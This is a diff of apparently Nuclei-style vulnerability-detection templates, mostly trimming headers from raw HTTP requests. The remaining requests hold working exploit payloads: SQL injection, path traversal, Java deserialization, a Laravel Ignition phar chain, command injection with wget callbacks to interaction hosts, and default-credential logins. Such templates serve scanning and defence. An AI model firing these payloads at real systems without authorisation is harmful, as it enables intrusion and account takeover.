User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Referer: {{BaseURL}}
content-type: application/json
Connection: close
{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}

View File

@ -17,7 +17,6 @@ requests:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 47
action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -

View File

@ -13,13 +13,7 @@ requests:
- |
POST /run HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 173
Connection: close
{"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}

View File

@ -15,10 +15,7 @@ requests:
- |
POST /druid/indexer/v1/sampler HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 1006
Connection: close
{
"type":"index",

View File

@ -19,42 +19,38 @@ requests:
- |
POST /webtools/control/SOAPService HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 910
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
</map-Key>
<map-Value>
<std-String value="http://t53lq9.dnslog.cn/"></std-String>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
</map-Key>
<map-Value>
<std-String value="http://t53lq9.dnslog.cn/"></std-String>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "OFBiz.Visitor="
part: header
- type: word
words:
- "deserializing"

View File

@ -16,18 +16,11 @@ requests:
GET /assets/app/something/services/AppModule.class/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
- |
GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
extractors:
- type: regex

View File

@ -4,8 +4,7 @@ info:
name: Hongdian Sensitive Information
author: gy741
severity: medium
description: |
Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
reference:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28150
@ -16,26 +15,12 @@ requests:
- |
GET /backup2.cgi HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
- |
GET /backup2.cgi HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
matchers-condition: and
matchers:

View File

@ -16,36 +16,18 @@ requests:
- |
POST /tools.cgi HTTP/1.1
Host: {{Hostname}}
Content-Length: 85
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Upgrade-Insecure-Requests: 1
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://{{Hostname}}/tools.cgi
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Referer: {{BaseURL}}/tools.cgi
op_type=ping&destination=%3Bid
- |
POST /tools.cgi HTTP/1.1
Host: {{Hostname}}
Content-Length: 85
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://{{Hostname}}/tools.cgi
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Referer: {{BaseURL}}/tools.cgi
op_type=ping&destination=%3Bid

View File

@ -14,21 +14,15 @@ requests:
- |
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Accept: */*
Content-Length: 23
Content-Type: application/json
Connection: close
{"Password":"{{randstr}}"}
- |
POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Content-Length: 50
Content-Type: application/json
Connection: close
{"UserName":"Administrator","Password":"{{randstr}}"}

View File

@ -14,11 +14,7 @@ requests:
POST /index.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
SPOOLDIR=test".system(id)."&recheck=Recheck

View File

@ -15,10 +15,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
@ -26,10 +23,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
@ -37,10 +31,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
@ -48,10 +39,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
@ -59,10 +47,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
@ -70,10 +55,7 @@ requests:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}

View File

@ -15,12 +15,8 @@ requests:
- |
POST /goform/setmac HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/index.htmlr
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Origin: {{BaseURL}}
Referer: {{BaseURL}}/index.htmlr
Content-Type: application/x-www-form-urlencoded
module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static

View File

@ -14,7 +14,6 @@ requests:
GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: {{Hostname}}
User-Agent: asusrouter--
Connection: close
Referer: {{BaseURL}}
Cookie: asus_token=\0Invalid; clickedItem_tab=0

View File

@ -14,10 +14,6 @@ requests:
- |
GET /status.htm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: language=en; login=1
matchers-condition: and

View File

@ -15,9 +15,6 @@ requests:
GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cache-Control: max-age=0
Connection: keep-alive
matchers:
- type: word

View File

@ -16,13 +16,11 @@ requests:
GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
- |+
GET /.%00/WEB-INF/web.xml HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
unsafe: true

View File

@ -12,13 +12,10 @@ requests:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
Origin: {{BaseURL}}
Referer: {{BaseURL}}
Connection: close
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_username"
@ -77,13 +74,10 @@ requests:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: {{BaseURL}}
Referer: {{BaseURL}}
Connection: close
log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In

View File

@ -10,16 +10,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
tags: cve,cve2021,tieline,default-login
# admin:password
requests:
- method: GET
path:
- '{{BaseURL}}/api/get_device_details'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: '{{BaseURL}}/assets/base/home.html'
Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
# admin:password
matchers-condition: and
matchers:

View File

@ -14,36 +14,24 @@ requests:
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"admin","password":"cs141-snmp"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"engineer","password":"engineer"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"guest","password":"guest"}

View File

@ -11,15 +11,9 @@ requests:
- |
POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: {{BaseURL}}
Referer: {{BaseURL}}/libs/granite/core/content/login.html
Connection: close
_charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true

Some files were not shown because too many files have changed in this diff Show More